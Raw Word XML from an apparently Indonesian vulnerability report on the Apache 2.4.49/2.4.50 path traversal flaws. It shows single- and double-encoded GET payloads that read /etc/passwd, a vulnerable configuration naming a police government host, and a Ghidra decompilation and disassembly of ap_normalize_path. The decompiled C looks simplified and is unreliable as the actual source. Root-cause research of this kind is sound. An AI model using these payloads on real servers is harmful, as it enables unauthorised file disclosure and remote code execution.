    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1D00A2B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%%32%65%%32%65/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7D14932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6C5840D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Setelah decode di filesystem: /icons/../../../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="375EEA3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Resolusi akhir             : /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2946DB82" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="437DC2CF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8.3 Perbedaan Single vs Double Encoding Payload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3CFFFFC7" w14:paraId="2F582B4D" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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D3E8" wp14:textId="75B0C975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 xml:space="preserve">Apache 2.4.49 </w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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 xml:space="preserve"> Single Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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ADAE" wp14:textId="3BAE36EF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 xml:space="preserve">Apache 2.4.50 </w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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 xml:space="preserve"> Double Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="76D5862A" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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73A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# Path traversal payload:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2810AE03" wp14:textId="0DF5109D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GET /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cgi</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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-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bin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/.%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2e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/.%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2e/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etc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/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253B970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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E78FF8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# Alternatif:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13967868" wp14:textId="63375EA3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GET /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cgi</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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-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bin/%2e%2e/%2e%2e/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etc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/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752553B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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AFFB762" wp14:textId="6395ABB5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># Filter yang di</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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>-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>bypass:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D427281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# Hanya cek '.' literal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="489A67DC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# %2e tidak dikenali = titik</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56051E4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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A9C242" wp14:textId="2BE21058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# CVSS: 7.5 (High) </w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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>-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patched 2.4.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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7DD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# Path traversal payload:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="195B65D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GET /icons/%%32%65%%32%65/%%32%65%%32%65/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5053DCEB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  %%32%65%%32%65/etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="554EF5F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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="215EB627" wp14:textId="1319F2D1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># Filter yang di</w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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>-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>bypass:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ADFEFDE" wp14:textId="4BB0072A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# 2.4.50 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cek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'%2e' </w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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-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TETAP LOLOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B56B7A9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# %%32%65 ≠ %2e setelah 1 decode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D592109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# Perlu 2x decode untuk jadi '.'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E235B9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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CEA86D2" wp14:textId="4E2A5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# CVSS: 9.8 (Critical) </w:t>
            </w:r>
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="2872A39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>-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patched 2.4.51</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5997CC1D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="74EDDCC5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8.4 Konfigurasi Apache yang Diperlukan untuk Eksploitasi</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="131B1F82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Tidak semua server Apache 2.4.50 rentan. Ada dua kondisi konfigurasi yang harus terpenuhi secara bersamaan agar eksploitasi berhasil:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="643EC966" wp14:textId="58D529B6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Kondisi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1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Konfigurasi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Direktori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Root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File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httpd.conf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atau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virtual host config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harus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memiliki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'Require all granted' pada &lt;Directory /&gt; ATAU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direktif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&lt;Directory /&gt;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tidak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ada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sama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sekali</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="173FB4F2" wp14:textId="5D7BDA39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Kondisi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2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Akses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Endpoint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Diizinkan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Endpoint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seperti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/icons/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atau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/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cgi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bin/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harus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dapat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diakses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dan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memiliki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traversal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mengarah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filesystem root</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="436F5B2F" wp14:textId="39F747E0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Kondisi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3 (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RCE)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mod_cgi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atau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mod_cgid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harus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aktif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dan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dapat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diakses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dari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direktori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dieksploitasi</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="110FFD37" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6293D52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Konfigurasi RENTAN (httpd.conf):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0FCD4EB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&lt;VirtualHost *:8080&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3DC468D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ServerName dumaspresisi.itwasum.polri.go.id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="32BEFAD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DocumentRoot /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5DB78B8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&lt;Directory /&gt;                  ← MASALAH: akses ke root filesystem</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="503D830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Options Indexes FollowSymLinks</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2425DC3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AllowOverride None</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7AB214C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Require all granted        ← MASALAH: semua akses diizinkan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5460D29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&lt;/Directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="239424B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Alias /icons/ /usr/share/apache2/icons/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3D5556FD" wp14:textId="46108CE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ScriptAlias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cgi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bin/ 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usr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/lib/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cgi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bin/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1E3337D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&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6B699379" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2E2D7055" wp14:textId="29842A08">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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9.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Ghidra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 Analysis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Decompilasi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 Biner Apache</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2C98420A" wp14:textId="1F6A3AAD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Analisis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biner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dilakukan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pada file httpd (Apache HTTP Server daemon) yang di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compile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versi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2.4.50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menggunakan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Ghidra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versi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10.3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dari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NSA Research Directorate. Tujuan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analisis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adalah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menemukan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akar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penyebab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(root cause)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kerentanan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pada level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kode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mesin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memvalidasi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temuan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secara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independen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dari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kode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sumber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420658AB" wp14:textId="44D49234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9.1 Setup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Ghidra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Import &amp;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Analisis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Awal</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0529A22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Import binary ke Ghidra:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="22B9823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File → Import File → /usr/sbin/httpd (Apache 2.4.50 binary)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="405D30F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Format: ELF  Architecture: x86:LE:64:default</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="45ECD20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Compiler: gcc  Language: C</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="66AC4DF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4CC621D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Analisis otomatis:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="693B18D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Analysis → Auto Analyze → Enable All → Analyze</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2A5D8E2B" wp14:textId="792796D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Durasi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: ~3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5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menit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tergantung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hardware</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="131F8F3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233D937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Cari fungsi target:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="260E035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Search → Search Text → 'normalize_path'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="241535A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Ditemukan: ap_normalize_path @ 0x00481200</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="455E230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6FC1631E" wp14:textId="04352CCB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# Cross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reference:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="14C773B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Right Click → References → Find References to ap_normalize_path</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4F7A77D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Dipanggil dari: ap_process_request_internal (request.c)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3FE9F23F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="613F13E9" wp14:textId="3EA81418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9.2 Decompiled C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Fungsi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ap_normalize_path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() [server/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util.c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]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="159E18C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/*</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1273D948" wp14:textId="127D0E13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*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Ghidra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Decompiler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Output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Apache HTTP Server 2.4.50</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7218623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* Fungsi : ap_normalize_path()</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3EE08C3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* File   : server/util.c</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="69413E8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* Address: 0x00481200</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0D6351D3" wp14:textId="2321C85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*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STATUS :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VULNERABLE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Single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pass URL decode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tidak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iteratif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)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="379FD72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*/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0A8DB01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7E98989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int ap_normalize_path(char *path, int flags)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="668EF8AE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{</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2B58ABC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char *src;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="74D7FA0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char *dst;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3992369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unsigned char decoded_char;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4A79F2D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int  path_len;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="03D8BA8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45CD10E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src = path;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="635CBD1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dst = path;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="60D0628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path_len = strlen(path);</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="69A0658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16CC12D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while (*src != '\0') {</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7D0B794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if (*src == '%') {</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2245AB92" wp14:textId="7A966AB8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    /* DECODE HANYA 1x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ROOT CAUSE KERENTANAN */</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="614A5D5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decoded_char = hex_to_uchar(src[1], src[2]);</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2EA285A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2E1FBFC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/* Jika %%32%65 masuk:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7A4A014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 * src[0] = '%'  (0x25)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="373D382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 * src[1] = '%'  (0x25)  ← bukan '3'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1344770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 * hex_to_uchar('%','%') = ERROR atau 0x00</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="17D4DFE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     *</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="160BC1F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 * Sebenarnya parser menangani ini sebagai literal '%'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4026BD5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 * kemudian maju ke karakter berikutnya secara berbeda</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="203EEAF3" wp14:textId="523B3B88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 *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lihat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jika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src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[1]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bukan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[0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9A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Fa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f], skip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sebagai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literal</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5C83618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     */</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="58BC89F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55F3A45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if (decoded_char == (unsigned char)'.') {</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1272AC18" wp14:textId="59DFC74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    /* Handle dot sequence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TIDAK TERCAPAI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untuk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%%32%65 */</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5BB085C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    goto handle_dotdot;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="55E0C8A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    }</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2F3093B4" wp14:textId="59E1CEA2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*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dst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++ =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decoded_char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;   /* Tulis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hasil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decode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no re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check */</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6EBB539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src += 3;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3628C5C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}</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7AEB38E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else if (*src == '/') {</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="52E7917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    /* Normalize multiple slashes */</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5F556F2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while (*(src+1) == '/') src++;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="01D890B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*dst++ = *src++;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="65A1F23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}</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3687377C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else {</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="08A67B2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*dst++ = *src++;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5892860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}</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="21A11B6E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continue;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="70945AB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0F32CF6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handle_dotdot:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="253CE4D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/* Periksa apakah ini ../ (traversal) */</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0AAB433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if (src[1] == '.' &amp;&amp; (src[2] == '/' || src[2] == '\0')) {</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5B697D6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/* Hapus direktori terakhir dari dst */</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3012A7A3" wp14:textId="6DF5F405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while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dst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&gt; path &amp;&amp; *(dst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1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) !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= '/')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dst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;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5EF2838B" wp14:textId="507ED3C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if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dst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&gt; path)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dst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;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1B217B6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src += (src[2] == '/') ? 3 : 2;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="24ED01A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} else {</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3AC8C4D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*dst++ = '.';</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1D3D272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src++;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="37659F5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}</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0D3AE92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}</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="46FCB3B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*dst = '\0';</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7FA3D0E2" wp14:textId="73543C13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return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1;  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* Path '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aman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'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HASIL SALAH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untuk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%%32%65 input */</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2239F6F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}</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1F72F646" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6F67247E" wp14:textId="2993E9E9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9.3 Disassembly x86_64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Bagian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Kritis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0989D7D2" wp14:textId="5D0CC90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; ── Disassembly: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ap_normalize_path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Titik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kritis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bypass ────────────────</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="69AB4681" wp14:textId="1BC7B4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;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Ghidra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listing view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Apache httpd 2.4.50 ELF x86_64</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="45FB2F1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391EDB8C" wp14:textId="4D86396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; Entry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setup stack frame</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="390852E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00481200  PUSH    RBP</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="51CF9AB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00481201  MOV     RBP, RSP</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1C6C0CC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00481204  PUSH    R15</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="100BDCB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00481206  PUSH    R14</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3F688F9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00481208  PUSH    R13</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="286E968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0048120A  PUSH    R12</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="52E77BA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0048120C  PUSH    RBX</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2508DB7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0048120D  SUB     RSP, 0x28</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="7382E098" wp14:textId="7B6D114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00481211  MOV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QWORD PTR [RBP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0x38], RDI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;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path argument</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6C81A602" wp14:textId="362BDA23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00481215  MOV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DWORD PTR [RBP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0x3C], ESI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;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flags argument</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="184D15E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66627796" wp14:textId="079E4B81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; Main loop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process character by character</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2273E53C" wp14:textId="55CA124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0048121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  MOV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RBX, QWORD PTR [RBP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0x38]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;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src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= path</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="08694561" wp14:textId="675FE4E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0048121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  MOV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R14, QWORD PTR [RBP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0x38]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;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dst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= path</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="63A420E6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4AF2681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; Check if current char is '%'</w:t>
      </w:r>
    </w:p>
